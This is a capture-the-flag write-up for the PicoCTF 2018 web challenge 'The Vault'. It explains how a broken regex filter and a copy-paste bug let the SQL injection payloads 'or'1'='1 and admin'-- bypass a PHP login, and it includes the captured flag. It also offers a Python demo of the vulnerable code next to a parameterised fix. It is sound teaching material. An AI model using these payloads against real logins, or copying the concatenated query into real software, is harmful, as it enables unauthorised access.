PicoCTF2018 – Web – The Vault
Objective:
There is a website running at http://2018shell.picoctf.com:64349. Try to see if you can login!
Solution:
This site is nice enough to give us the source of login.php. Looking through it, you can see an attempt to sanitize the inputs with a regular expression: it builds a variable named $pattern holding a regex and matches it against the submitted values before the query is run.
```php
//validation check
// Blocks a quote character followed (anywhere later) by "OR", case-insensitive.
$pattern = "/.*['\"].*OR.*/i";
$user_match = preg_match($pattern, $username);
$password_match = preg_match($pattern, $username); // bug: checks $username, not $password
if($user_match + $password_match > 0) {
    echo "<h1>SQLi detected.</h1>";
}
else {
    // $query is built earlier in the file by concatenating the raw inputs
    // (the debug=1 output further down shows the resulting string)
    $result = $con->query($query);
    $row = $result->fetchArray();
    if ($row) {
        echo "<h1>Logged in!</h1>";
        echo "<p>Your flag is: $FLAG</p>";
    } else {
        echo "<h1>Login failed.</h1>";
    }
}
?>
```
However, this check is not implemented correctly. I tried putting in OR ' and I never got the SQLi detected error: the regex only fires when a quote character comes before the OR, so an OR followed by a quote passes straight through. Also, if you look closely at the code, the password is never checked at all, because the second preg_match was given the wrong variable name. Even if the regex worked, this line only ever looks at the username:

```php
$password_match = preg_match($pattern, $username); // <-- should be $password
```
Again, I loaded this up in Burp Suite, found the POST request and sent it to Repeater to quickly try some things. The POST body also carries a debug parameter; change it to 1 and the response shows the actual SQL statement that was run. I then tried values in the password field that add an OR with a condition that is always true:

```
username=admin&password='or'1'='1&debug=1
```
This gave me the flag:

```
HTTP/1.1 200 OK
Content-type: text/html; charset=UTF-8

<pre>username: admin
password: 'or'1'='1
SQL query: SELECT 1 FROM users WHERE name='admin' AND password=''or'1'='1'
</pre><h1>Logged in!</h1><p>Your flag is: picoCTF{w3lc0m3_t0_th3_vau1t_e4ca2258}</p>
```

The injected password turns the WHERE clause into `password='' OR '1'='1'`, which is true for every row, so the admin row comes back and the script prints the flag.
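To make the two weaknesses concrete, here is an added example (my own code, not part of the challenge or the original post) that re-implements login.php's filter and query construction in Python against an in-memory SQLite database. The users table, its single row and the password value are constructed sample data, since the challenge only reveals the table and column names through the debug output. Beyond the page's own payload, it also shows a second bypass that the regex never sees (a comment terminator in the username) and the parameterised query that closes both holes:

```python
import re
import sqlite3

# The filter from login.php: a quote followed, anywhere later, by "OR".
# preg_match is an unanchored search, so re.search is the faithful mirror.
PATTERN = re.compile(r".*['\"].*OR.*", re.IGNORECASE)


def is_blocked(value):
    """True when the challenge's regex would report 'SQLi detected'."""
    return PATTERN.search(value) is not None


def make_db():
    """Constructed sample data: the real schema beyond users/name/password is unknown."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (name TEXT, password TEXT)")
    con.execute("INSERT INTO users VALUES ('admin', 'not-the-real-password')")
    return con


def build_query(username, password):
    """Builds the same string login.php runs (as printed by debug=1)."""
    return f"SELECT 1 FROM users WHERE name='{username}' AND password='{password}'"


def vulnerable_login(con, username, password):
    """Mirrors login.php: the regex is run on the username twice (the page's
    bug, kept on purpose), so the password is never filtered, and the query
    is assembled by string concatenation."""
    user_match = is_blocked(username)
    password_match = is_blocked(username)  # bug: should be password
    if user_match or password_match:
        return "SQLi detected"
    try:
        row = con.execute(build_query(username, password)).fetchone()
    except sqlite3.Error:
        # A broken query in the real app would surface as a PHP error; treat it as a failed login.
        return "Login failed"
    return "Logged in" if row else "Login failed"


def fixed_login(con, username, password):
    """Parameterised query: the inputs are bound as values and can never
    change the SQL structure, so no blacklist regex is needed at all."""
    row = con.execute(
        "SELECT 1 FROM users WHERE name=? AND password=?",
        (username, password),
    ).fetchone()
    return "Logged in" if row else "Login failed"


if __name__ == "__main__":
    con = make_db()
    for user, pw in [("admin", "'or'1'='1"), ("'or'1'='1", "x"), ("admin'-- ", "x")]:
        print(repr(user), repr(pw), "->", vulnerable_login(con, user, pw),
              "| fixed:", fixed_login(con, user, pw))
```

The first case is the page's own payload: the username passes the regex, the password is never looked at, and SQLite evaluates `password='' OR '1'='1'` as true. The second shows the regex doing its one job when the quote-then-OR pattern lands in the username. The third shows that even a correctly applied blacklist is the wrong control: `admin'-- ` contains no OR, so it sails past the filter, and the `--` comment discards the password check entirely. The parameterised version rejects all three without any pattern matching.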